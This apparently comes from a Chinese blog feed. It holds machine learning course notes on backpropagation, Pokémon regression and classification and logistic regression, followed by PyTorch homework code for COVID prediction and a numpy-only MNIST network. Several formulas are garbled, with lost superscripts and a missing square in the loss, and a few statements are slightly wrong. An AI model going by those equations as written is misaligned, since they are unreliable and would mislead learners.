    搜索 $L$ 的最小值的方法:梯度下降。

    就连 Alpha Go 也使用梯度下降。

    png

    反向传播:计算各种微分的有效方式。人工计算微分总是很麻烦,往往使用现成的库。

    png

    理论:只要神经元个数够多,总能拟合出任意函数。

    png

    其他资源:

    Backpropagation

    png

    backpropagation 反向传播算法是在梯度下降算法中计算梯度一种有效率的算法。

    png

    链式法则

    • Case 1 $y=g(x)\ z=h(y)$
      • $\Delta x \rightarrow \Delta y \rightarrow \Delta z$
      • 要求 $z$ 对 $x$ 的导数:$\frac{dz}{dx}=\frac{dz}{dy}\frac{dy}{dx}$
    • Case 2 $x=g(s)\ y=h(s)\ z=k(x,y)$
      • 要求 $z$ 对 $s$ 的导数:$\frac{dz}{ds}=\frac{\partial z}{\partial x}\frac{dx}{ds}+\frac{\partial z}{\partial y}\frac{dy}{ds}$

    png

    对于梯度下降方法,需要求 $L$ 对各个神经元 $w$ 的权重:

    $$L(\theta)=\sumN_{n=1}Cn(\theta)\rightarrow \frac{\partial L(\theta)}{\partial w}=\sum^N_{n=1}\frac{\partial C^n(\theta)}{\partial w}$$

    要求 $\frac{\partial L(\theta)}{\partial w}$ 就要求 $\frac{\partial C}{\partial w}$。

    png

    根据链式法则,$\frac{\partial C}{\partial w}=\frac{\partial z}{\partial w}\frac{\partial C}{\partial z}$

    对于 Forward pass,用于计算 $\frac{\partial z}{\partial w}$,

    对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$,$z$ 是神经元的输出数据。

    png

    对于 Forward pass,如示意图,$z=x_1w_1+x_2w_2+b$,因此$\frac{\partial z}{\partial w_1}=x_1$,$\frac{\partial z}{\partial w_2}=x_2$,值就是输入进来的权重 $w$。

    png

    png

    而对于 Backward pass,用于计算 $\frac{\partial C}{\partial z}$根据链式法则,$\frac{\partial C}{\partial z}=\frac{\partial a}{\partial z}\frac{\partial C}{\partial a}=\frac{\partial z’}{\partial a}\frac{\partial C}{\partial z’}+\frac{\partial z’‘}{\partial a}\frac{\partial C}{\partial z’'}$

    $z$ 对上一个神经元经过激活函数后的输出 $a$ 很好计算(就是其权重 $w$),难点是交叉熵损失函数 $C$ 对 $z$ 的导数。

    png

    此时就要通过神经元后面的数据来计算 $\frac{\partial C}{\partial z}=\sigma’(z)\left[w_3\frac{\partial C}{\partial z’}+w_4\frac{\partial C}{\partial z’'}\right]$

    其中 $\sigma’(z)$ 就是激活函数的导数,是一个常数,因为 $z$ 的值已经在 forward pass 中得到。

    对于 Sigmoid 函数 $f(x)=\frac{1}{1+e^{-x}}$,其导函数 $f’(x)=f(x)\left[1-f(x)\right]$

    png

    如果当前层的下一层是输出层,则可以根据输出的值计算 $\frac{\partial C}{\partial z’}$

    png

    如果不是,则要递归地计算下一层的 $\frac{\partial C}{\partial z}$,直到下一层为输出层。

    png

    png

    最后总结,通过 Forward Pass 计算得到 $\frac{\partial z}{\partial w}=a$,再通过 Backward Pass 计算得到 $\frac{\partial C}{\partial z}$,两者相乘就得到要求的 $\frac{\partial C}{\partial w}$。

    Predicting Pokémon CP

    这是一个回归问题的案例分析。

    png

    回归 Regression 可以

    • 预测股票

      • 输入股票曲线,输出明天的道琼指数
    • 自动驾驶

      • 输入周边环境,输出操纵方向盘
    • 商品推荐

      • 输入使用者和商品,输出购买可能性

    png

    课程的案例分析是:

    已知宝可梦的战力值 $x_{cp}$,类型 $x_s$,体力 $x_{hp}$,重量 $x_w$,身高 $x_h$,尝试推测进化后的宝可梦的 CP(战力)值 $y$

    Step 1: Model

    png

    先假定一个线性模型,进化后的战力值只与当前战力值相关,$y=b+wx_{cp}$。

    Step 2: Goodness of Function

    png

    训练集是 10 个宝可梦的数据,记作 $(x^1,\hat y^1), (x^2, \hat y2)…(x10, \hat y^{10})$。

    png

    设计损失函数估算误差 Estimation error:$\mathrm{L}(f)=\mathrm{L}(w, b)=\sum^{10}{n=1}\left(\hat y^n - (b+w\cdot x^n{cp})\right)$

    Step 3: Gradient Descent

    png

    使用梯度下降方法以解决 $w^*=arg\min_wL(w)$

    png

    梯度下降只能找到极小值而不能保证找到最小值,在初始参数不同的时候可能会得到不同的结果。

    但在线性模型中,这个问题不存在,因为此时极小值就是最小值。

    png

    此时得到的训练模型 $b=-188.4, w=2.7$,在训练集中 $L=35.0$,在测试集中 $L=31.9$

    png

    考虑将模型换为更复杂的模型,此时 $L$ 值有所下降。

    Model Selection

    png

    选择的模型次数越高,模型在训练集上的 $L$ 值越小,但在测试集值中可能不降反增 $L$,这个现象称之为过拟合

    就好比你在驾校练车,练着练着发现了查看某些标记点开车效果更好,但在真实道路上并不能表现得更好。

    png

    考虑其他因素对 $y$ 的影响,如宝可梦本身的种族,不同的种族应用不同的线性模型。

    png

    引入独热编码,此时模型变为 $y=b+\sum w_ix_i$。

    png

    此法再次有效地降低了 $L$。

    png

    当模型过于复杂时,还是会出现过拟合的问题。

    png

    尝试修改 $L$ 的表达式,$L=\sum_n\left(\hat y^n-\left(b+\sum w_ix_i\right)\right)^2+{\color{Red}\lambda \sum(w_i)^2}$,这样当函数曲线变得不够平滑时,会得到一定的惩罚。

    png

    $\lambda$ 是一个超参数,太大太小都不好。We prefer smooth function, but don’t be too smooth.

    Pokemon classification

    Classification: Probabilistic Generative Model 分类:概率生成模型

    png

    分类问题:接受输入 $x$,输出分类的类别 $n$。

    实例:

    • Credit Scoring 信用评分
      • Input: income, savings, profession, age, past financial history…
      • Output: accept or refuse 借不借你钱
    • Medical Diagnosis 医疗诊断
      • Input: current symptoms, age, gender, past medical history …
      • Output: which kind of diseases 你得了啥病
    • Handwritten character recognition 手写体识别
      • Input: 手写图像
      • Output: 写的啥字

    png

    课程案例:根据宝可梦的种族值(血量、攻击、防御、特攻、特防、速度)预测这只宝可梦的属性。

    png

    如果强行把分类问题看作是一个回归问题:训练时把类别 1 当作输入为 1,把类别 2 当作输出为 -1

    测试时输出越接近 1,越认为是类别 1;输出越接近 -1,越认为是类别 2。

    png

    回归会将由于一些“太正确”的点而改变回归直线使得分类不正确。如果要分的类别更多则效果更差。

    png

    理想的替代:

    • 函数模型
      • $x$ 在 $f(x)$ 中,如果 $g(x)>0$,则认为是类别 1,否则是类别 2
    • 损失函数
      • $L(f)=\sum_n\delta(f(x^n)\ne \hat y^n)$,得到错误分类数据的次数
    • 找到一个方法使得 $L$ 最小
      • 例子:感知机,SVM

    png

    使用概率模型:

    $$P(x)=P(x|C_1)P(C_1)+P(x|C_2)P(C_2)$$

    png

    我们把序号 $< 400$ 的宝可梦当作训练集,其余当作测试集。

    序号 $< 400$ 的宝可梦中有 $79$ 只水系,$61$ 只普通系,因此 $P(C_1)=79/(79+61)=0.56, P(C_2)=61/(79+61)=0.44$

    png

    我们先假设宝可梦的种族只与宝可梦的防御和特防有关。

    如可达鸭的防御为 48,特防为 50,则它的特征向量为 $\begin{bmatrix} 48 \ 50 \end{bmatrix}$。

    我们假设水系宝可梦的防御和特防服从正态分布。

    png

    正态分布函数:

    $$f_{\mu,\Sigma}(x)=\frac{1}{(2\pi){D/2}}\frac{1}{|\Sigma|{1/2}}\exp{-\frac{1}{2}(x-\mu)T\Sigma{-1}(x-\mu)}$$

    • Input: vector $x$
    • output:
      • probability of sampling 采样概率 $x$
      • The shape of the function determines by mean 均值 $\mu$ and covariance matrix 协方差矩阵 $\Sigma$ 函数的图像由均值和协方差矩阵决定。

    png

    假设这些点是从高斯分布中取样的。
    找到它们背后的高斯分布。

    png

    最大似然估计法

    具有任何均值 $\mu$ 和协方差矩阵 $\Sigma$ 的高斯分布可以生成这些点

    当给定样本 $x1,x2,x3,…,x{79}$ 时,$\mu$ 和 $\Sigma$ 取得对应值的概率

    评估函数:

    $$L(\mu,\Sigma)=f_{\mu,\Sigma}(x1)f_{\mu,\Sigma}(x2)f_{\mu,\Sigma}(x3)…f_{\mu,\Sigma}(x{79})$$

    png

    为了让 $L$ 最小,$\mu$ 取样本的均值,$\Sigma$ 取样本的协方差。

    png

    此时计算两个属性的宝可梦样本的 $\mu$ 和 $\Sigma$。

    png

    在公式的参数都可求后,我们便可以进行分类。

    当 $P(C_1|x)>0.5$ 时,我们便认为样本 $x$ 属于类别 1。

    png

    然而这效果并不好…即使把所有因素都考虑进去,也只有 54% 的准确率。

    png

    开始调整模型,假设两个分类的协方差矩阵相同。

    png

    此时两种属性共用 $\Sigma = \frac{79}{140}\Sigma1+\frac{61}{140}\Sigma2$

    png

    此时分类边界又变成了直线,虽然与回归直线完全不同,但我们也把它称之为线性模型。

    将所有因素考虑进来,准确率提升至 73%。

    png

    总结 3 个步骤:

    • 建立模型
    • 评价函数好坏
    • 找到一个最好的函数

    png

    如果你假定所有分布都是独立的,则说明你在使用朴素贝叶斯分类器

    而对于二分类问题,你不要使用高斯分布,而是使用伯努利分布。

    png

    分析为什么边界是一条直线?

    将 $P(C_1|x)$ 推演成用 Sigmoid 函数来表示的形式 $P(C_1|x)=\sigma(z)$

    png

    png

    png

    一阵推演,$z$ 可以用一个线性式表示。

    $P(C_1|x)=\sigma(w\cdot x + b)$,将 $\Sigma$ 共用的时候,class 1 和 class 2 的 boundary 是线性的。

    我们可以直接找到 $w$ 和 $b$ 以求得边界而绕开计算 $N_1,N_2,\mu1,\mu2,\Sigma$ 吗?且听下回分解。

    Logistic Regression

    png

    由上节课得到选取的函数模型 $f_{w,b}(x)=P_{w,b}(C_1|x)$

    png

    $$f_{w,b}(x)=\sigma(z),z=\sum_iw_ix_i$$

    png

    定义评估函数

    $$L(w,b)=f_{w,b}(x1)f_{w,b}(x2)\left(1-f_{w,b}(x3)\right)…f_{w,b}(xN)$$

    目标是选取 $w*,b*$,使得 $L$ 最大。

    png

    将分类的类别用 $\hat y^n$ 表示,1 表示类别 1,0 表示类别 2。

    将问题由查找 $arg\max_{w,b}L(w,b)$ 转为 $arg\min_{w,b}-\ln L(x,b)$

    png

    最后得到由伯努利分布的交叉熵损失函数表示 $-\ln L(w,b)$。

    png

    为什么在 Logistics Regression 中,不像 Linear Regression 一样使用 square error?

    png

    查找一个最好的函数:求出 $-\ln L(w,b)$ 的最小值。

    依旧使用梯度下降方法。

    png

    png

    最后得到的方法与 Linear Regression 一样。

    总结:

    StepLogistic RegressionLinear Regression
    1 定义模型$f_{w,b}(x)=\sigma\left(\sum_iw_ix_i+b\right)$,值域 $[0,1]$$f_{w,b}(x)-\sum_iw_ix_i+b$,输出可以是任意值
    2 衡量模型好坏对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:1 表示类别 1,0 表示类别 2
    损失函数:$L(f)=\sum_n C(f(x^n),\hat y^n)$,交叉熵损失函数
    对于训练集:$(x^n,\hat y^n)$
    对于 $\hat y^n$:真实值
    损失函数:$L(f)=\frac{1}{2}\sum_n (f(x^n)-\hat yn)2$,MSE
    3 查找最佳模型两者相同两者相同

    png

    当 Logistic Regression 使用 Square Error 作为损失函数?

    出现微分值为 0 的情况,导致参数无法迭代更新。

    png

    Cross Entropy 与 Square Error 的对比,Square Error 的梯度在 Logistics Regression 中太平缓,不利于训练。

    png

    对于 $P(C_1|x)=\sigma(w\cdot x + b)$:

    Discriminative 判别模型直接查找 $w$ 和 $b$

    Generative 概率模型需要计算样本的 $\mu1,\mu2,\Sigma^{-1}$

    两者选取的模型相同,但是最终得到的函数往往不同。

    png

    同样的模型,同样的训练数据,采用两种方法所得结果 $(w,b)$ 不同。因为生成模型对概率分布事先做了假设。所以一般来说,Discriminative model 会比 Generative model 表现更好。

    png

    对于如图上的训练集,给出测试集 $\begin{bmatrix}1\1\end{bmatrix}$,使用朴素贝叶斯分类器得到的结果是类别 2,这与直觉相悖。

    png

    • Benefit of generative model 概率模型的优点
      • With the assumption of probability distribution,less training data is needed
        • 在概率分布的假设下,需要的训练数据较少。
      • With the assumption of probability distributionmore robust to the noise
        • 在概率分布的假设下,对噪声更加稳健。
      • Priors and class-dependent probabilities can beestimated from different sources.
        • 可以从不同的来源估算出优先权和依赖类的概率。

    png

    png

    对于更多类别,使用 Softmax 操作得到概率分布。

    Softmax 的公式得到了数学证明。

    png

    Logistic Regression 的局限性——难以解决异或问题。

    png

    因为你无法找到一个直线划分它们。

    png

    解决方法:特征转移。如将 $x1’$: 点到 $\begin{bmatrix}0\0\end{bmatrix}$ 的距离,$x2’$: 点到 $\begin{bmatrix}1\1\end{bmatrix}$ 的距离,此时经过转换后的数据便可以用一条直线划分。

    但是找到这种特征转移函数并不是件易事。

    png

    通过在分类感知器前面再加上一些神经元以便特征转移。

    png

    此时便找到了一个方法使用 Logistic Regression 解决异或问题。

    png

    我们把这种方法总结起来就是个神经网络,也可以叫它 Deep Learning。

    HW1

    Download data

    https://www.kaggle.com/competitions/ml2022spring-hw1 获取数据集 covid.train.csvcovid.test.csv

    Import packages

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    # 数值运算
    import math
    import numpy as np
    # 读写数据
    import pandas as pd
    import os
    import csv
    # 进度条
    from tqdm import tqdm
    # Pytorch
    import torch
    import torch.nn as nn
    from torch.utils.data import Dataset, DataLoader, random_split
    # 绘制学习曲线
    from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions

    You do not need to modify this part.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    def same_seed(seed): 
    """
    Fixes random number generator seeds for reproducibility.
    修正随机数种子以保证结果可重复性。
    """
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed_all(seed)


    def train_valid_split(data_set, valid_ratio, seed):
    """
    Split provided training data into training set and validation set
    将提供的训练数据分成训练集和验证集,返回 numpy.array 形式
    """
    valid_set_size = int(valid_ratio * len(data_set))
    train_set_size = len(data_set) - valid_set_size
    train_set, valid_set = random_split(data_set,
    [train_set_size, valid_set_size],
    generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)


    def predict(test_loader, model, device):
    model.eval() # Set your model to evaluation mode. 将你的模型设置为评估模式。
    preds = []
    for x in tqdm(test_loader):
    x = x.to(device)
    with torch.no_grad():
    pred = model(x)
    preds.append(pred.detach().cpu())
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    class COVID19Dataset(Dataset):
    """
    x: 特征
    y: 目标,如果为空,则做预测
    """
    def __init__(self, x, y=None):
    if y is None:
    self.y = y
    else:
    self.y = torch.FloatTensor(y) # 将数据集由 np.array 转成 torch.tensor 形式
    self.x = torch.FloatTensor(x)


    def __getitem__(self, idx):
    """
    根据索引返回数据
    """
    if self.y is None:
    return self.x[idx]
    else:
    return self.x[idx], self.y[idx]


    def __len__(self):
    return len(self.x)

    Neural Network Model

    通过修改下面的类,尝试不同的模型架构。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    class My_Model(nn.Module):
    def __init__(self, input_dim):
    super(My_Model, self).__init__() # 调用父类 nn.Module 的 __init__
    # TODO: 修改模型的结构,注意维度。
    # 定义 lyaers 变量,构造神经网络结构
    self.layers = nn.Sequential(
    nn.Linear(input_dim, 16),
    nn.ReLU(), # 激活函数:ReLU
    nn.Linear(16, 8), # 输入特征数 16,输出特征数 8
    nn.ReLU(),
    nn.Linear(8, 1) # # 输入特征数 8,输出特征数 1(回归问题)
    )


    def forward(self, x):
    x = self.layers(x)
    x = x.squeeze(1) # 对数组维度进行压缩 (B, 1) -> (B)
    return x

    Feature Selection

    通过修改下面的函数,选择你认为有用的特征。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    def select_feat(train_data, valid_data, test_data,
    select_all=True):
    """
    选择有用的特征来进行回归。
    """
    y_train, y_valid = train_data[:, -1], valid_data[:, -1]
    raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

    if select_all:
    feat_idx = list(range(raw_x_train.shape[1]))
    else:
    feat_idx = [0, 1, 2, 3, 4] # TODO: 选择合适的特征列

    return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
    y_train, y_valid

    Training Loop

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    def trainer(train_loader, valid_loader, model, config, device):
    # 定义损失函数
    criterion = nn.MSELoss(reduction='mean')
    # 定义优化函数
    # TODO: 访问 Please check https://pytorch.org/docs/stable/optim.html 了解更多可用函数
    # TODO: L2 正则化,或自行实现
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

    writer = SummaryWriter() # 可视化工具 tensorboard

    if not os.path.isdir('./models'):
    os.mkdir('./models') # 新建一个文件夹以保存模型

    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
    model.train() # 将你的模型设为训练模式
    loss_record = []

    # tqdm 是一个可视化训练进度的包
    train_pbar = tqdm(train_loader, position=0, leave=True)

    for x, y in train_pbar:
    optimizer.zero_grad() # 将梯度设为 0
    x, y = x.to(device), y.to(device) # 将数据读入设备
    pred = model(x)
    loss = criterion(pred, y)
    loss.backward() # 计算梯度(backpropagation 方法)
    optimizer.step() # 更新参数
    step += 1
    loss_record.append(loss.detach().item())

    # 在进度条显示当前 epoch 次数和损失函数的值
    train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
    train_pbar.set_postfix({'loss': loss.detach().item()})

    mean_train_loss = sum(loss_record) / len(loss_record)
    writer.add_scalar('Loss/train', mean_train_loss, step)

    model.eval() # 将你的模型设为评估模式
    loss_record = []
    for x, y in valid_loader:
    x, y = x.to(device), y.to(device)
    with torch.no_grad():
    pred = model(x)
    loss = criterion(pred, y)

    loss_record.append(loss.item())

    mean_valid_loss = sum(loss_record) / len(loss_record)
    print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss: .4f},\
    Valid loss: {mean_valid_loss: .4f}')
    writer.add_scalar('Loss/valid', mean_valid_loss, step)

    if mean_valid_loss < best_loss:
    best_loss = mean_valid_loss
    torch.save(model.state_dict(), config['save_path']) # 保存你最好的模型
    print('Saving model with loss {:.3f}...'.format(best_loss))
    early_stop_count = 0
    else:
    early_stop_count += 1

    if early_stop_count >= config['early_stop']:
    # 模型没有改善,所以我们停止了训练
    print('\nModel is not improving, so we halt the training session.')
    return

    Configurations

    配置

    config 包含了 超参数 和 模型保存路径。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    config = {
    'seed': 5201314, # 随机数种子
    'select_all': True, # 是否使用所有特征
    'valid_ratio': 0.2, # 验证集大小 = 训练集大小 * valid_ratio
    'n_epochs': 3000, # epoch 数量
    'batch_size': 256, # batch 大小
    'learning_rate': 1e-5, # 学习率
    'early_stop': 400, # 如果模型训练在这么多次尝试后都没有得到改善,停止训练。
    'save_path': './models/model.ckpt' # 模型保存路径
    }

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    # Set seed for reproducibility
    same_seed(config['seed'])

    # train_data size: 2699 x 118 (id + 37states + 16 features x 5 days)
    # test_data size: 1078 x 117 (without last day's positive rate)
    train_data, test_data = pd.read_csv('./covid.train.csv').values,\
    pd.read_csv('./covid.test.csv').values
    train_data, valid_data = train_valid_split(train_data,
    config['valid_ratio'],
    config['seed'])

    # Print out the data size.
    print(f"""train_data size: {train_data.shape}
    valid_data size: {valid_data.shape}
    test_data size: {test_data.shape}""")

    # Select features
    x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
    valid_data,
    test_data,
    config['select_all'])

    # Print out the number of features.
    print(f'number of features: {x_train.shape[1]}')

    train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
    COVID19Dataset(x_valid, y_valid), \
    COVID19Dataset(x_test)

    # Pytorch data loader loads pytorch dataset into batches.
    train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
    shuffle=True,
    pin_memory=True)
    valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
    shuffle=True,
    pin_memory=True)
    test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
    shuffle=False,
    pin_memory=True)
    train_data size: (2160, 118) valid_data size: (539, 118) test_data size: (1078, 117)number of features: 117

    Start training!

    1
    2
    3
    4
    # put your model and data on the same computation device.
    # 把你的模型和数据放在同一个计算设备上。
    model = My_Model(input_dim=x_train.shape[1]).to(device)
    trainer(train_loader, valid_loader, model, config, device)

    Plot learning curves with tensorboard (optional)

    可视化训练结果。

    tensorboard is a tool that allows you to visualize your training progress.

    If this block does not display your learning curve, please wait for few minutes, and re-run this block. It might take some time to load your logging information.

    1
    2
    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    此处会在 Jupyter Nodebook 中显示 tensorboard

    Testing

    The predictions of your model on testing set will be stored at pred.csv.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    def save_pred(preds, file):
    ''' Save predictions to specified file '''
    with open(file, 'w') as fp:
    writer = csv.writer(fp)
    writer.writerow(['id', 'tested_positive'])
    for i, p in enumerate(preds):
    writer.writerow([i, p])

    model = My_Model(input_dim=x_train.shape[1]).to(device)
    model.load_state_dict(torch.load(config['save_path']))
    preds = predict(test_loader, model, device)
    save_pred(preds, 'pred.csv')
    100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
    ]]>
    @@ -8554,7 +8554,7 @@ /posts/Python-Building%20a%20neural%20network%20FROM%20SCRATCH%20(no%20Tensorflow%20or%20Pytorch,%20just%20numpy%20&%20math)/ - 前言

    教你怎么只用 numpy 和数学方法构建一个神经网络,而不是使用 Tensorflow 或 Pytorch。

    相关资源

    内容

    导入相关库

    import numpy as np
    import pandas as pd
    from matplotlib import pyplot as plt

    读取数据集

    data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')
    data.shape
    (42000, 785)

    数组形状:$(42000, 785)$, 说明:

    • $42000$ 行, 表示这个数据集有 $42000$ 张图片

    • $785$ 列, 表示数据集中每张图片大小为 $28 \times 28$, 外带 $1$ 个标签, $28 \times 28 + 1 = 785$

    将数据集分为训练集和测试集

    data = np.array(data)  # 将数据集从 pd.DataFrame 转为 np.array
    m, n = data.shape
    np.random.shuffle(data) # shuffle 直接在原来的数组上进行操作,改变原来数组的顺序,无返回值

    # 验证集
    data_dev = data[0:1000].T # 前 1000 个
    Y_dev = data_dev[0]
    X_dev = data_dev[1:n]
    X_dev = X_dev / 255. # 将图像各像素点的灰度值映射到 0 到 1 之间的浮点数,使之后的 exp 运算不会溢出

    # 训练集
    data_train = data[1000:m].T
    Y_train = data_train[0]
    X_train = data_train[1:n]
    X_train = X_train / 255.
    _,m_train = X_train.shape

    定义相关函数

    ​ Our NN will have a simple two-layer architecture. Input layer $a^{[0]}$ will have $784$ units corresponding to the $784$ pixels in each $28\times 28$ input image. A hidden layer $a^{[1]}$ will have $10$ units with ReLU activation, and finally our output layer $a^{[2]}$ will have $10$ units corresponding to the ten digit classes with softmax activation.

    ​ 我们的神经网络将有一个简单的两层结构。输入层 $a^{[0]}$ 将有 $784$ 个单元,对应于每个 $28\times 28$ 输入图像中的 $784$ 个像素。隐藏层 $a^{[1]}$ 将有 $10$ 个单元,用 ReLU 激活,最后我们的输出层 $a^{[2]}$ 将有 $10$ 个单元,对应于用 softmax 激活的 $10$ 个数字类别。

    Vars and shapes

    png

    Forward prop

    • $A^{[0]} = X$: 784 x m
    • $Z^{[1]} \sim A^{[1]}$: 10 x m
    • $W^{[1]}$: 10 x 784 (as $W^{[1]} A^{[0]} \sim Z^{[1]}$)
    • $B^{[1]}$: 10 x 1
    • $Z^{[2]} \sim A^{[2]}$: 10 x m
    • $W^{[1]}$: 10 x 10 (as $W^{[2]} A^{[1]} \sim Z^{[2]}$)
    • $B^{[2]}$: 10 x 1

    Backprop

    • $dZ^{[2]}$: 10 x m ($~A^{[2]}$)
    • $dW^{[2]}$: 10 x 10
    • $dB^{[2]}$: 10 x 1
    • $dZ^{[1]}$: 10 x m ($~A^{[1]}$)
    • $dW^{[1]}$: 10 x 10
    • $dB^{[1]}$: 10 x 1

    初始化参数

    使初始参数随机在 [-0.5, 0.5) 之间

    通过 np.random.rand() 可以返回一个或一组服从“0 ~ 1”均匀分布的随机样本值。随机样本取值范围是 [0, 1),不包括 1。

    def init_params():
    W1 = np.random.rand(10, 784) - 0.5
    b1 = np.random.rand(10, 1) - 0.5
    W2 = np.random.rand(10, 10) - 0.5
    b2 = np.random.rand(10, 1) - 0.5
    return W1, b1, W2, b2

    激活函数: ReLU

    def ReLU(Z):
    return np.maximum(Z, 0)

    Softmax

    Softmax 函数将各个输出节点的输出值范围映射到 [0, 1],并且约束各个输出节点的输出值的和为 1。

    $Softmax(z_i)=\frac{ez_i}{\sumC_{C=1}e^{z_C}}$,其中 $z_i$ 为第 $i$ 个节点的输出值,$C$ 为输出结点的个数,即分类的类别个数。通过 Softmax 函数就可以将多分类的输出值转换为范围在 [0, 1] 和为 1 的概率分布。

    png

    def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A

    前向传播

    $$Z^{[1]} = W^{[1]} X + b^{[1]}$$
    $$A^{[1]} = g_{\text{ReLU}}(Z^{[1]}))$$
    $$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$$
    $$A^{[2]} = g_{\text{softmax}}(Z^{[2]})$$

    def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2

    ReLU 函数的导数,用于梯度下降

    def ReLU_deriv(Z):
    return Z > 0

    独热编码

    将标签 Y 转为独热编码:

    def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y

    反向传播

    $$dZ^{[2]} = A^{[2]} - Y$$
    $$dW^{[2]} = \frac{1}{m} dZ^{[2]} A^{[1]T}$$
    $$dB^{[2]} = \frac{1}{m} \Sigma {dZ^{[2]}}$$
    $$dZ^{[1]} = W^{[2]T} dZ^{[2]} .* g^{[1]\prime} (z^{[1]})$$
    $$dW^{[1]} = \frac{1}{m} dZ^{[1]} A^{[0]T}$$
    $$dB^{[1]} = \frac{1}{m} \Sigma {dZ^{[1]}}$$

    def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2

    调整参数

    根据学习率 alpha 调整参数:

    $$W^{[2]} := W^{[2]} - \alpha dW^{[2]}$$
    $$b^{[2]} := b^{[2]} - \alpha db^{[2]}$$
    $$W^{[1]} := W^{[1]} - \alpha dW^{[1]}$$
    $$b^{[1]} := b^{[1]} - \alpha db^{[1]}$$

    def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2

    预测结果

    numpy.argmax() 函数返回特定轴上数组的最大元素的索引,选取可能性最大的分类结果作为最终的分类结果。

    def get_predictions(A2):
    return np.argmax(A2, 0)

    计算准确率

    def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size # 准确率 = 正确数 / 总数

    梯度下降

    def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params() # 初始化参数
    for i in range(iterations):
    Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X) # 前向传播
    dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y) # 反向传播
    W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha) # 调参
    if i % 10 == 0: # 每训练 10 个 epoch 就显示一次准确率
    print("Iteration:", i)
    predictions = get_predictions(A2)
    print("Accuray:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2

    训练神经网络

    最后得到的准确率以及神经网络的各个参数:

    W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
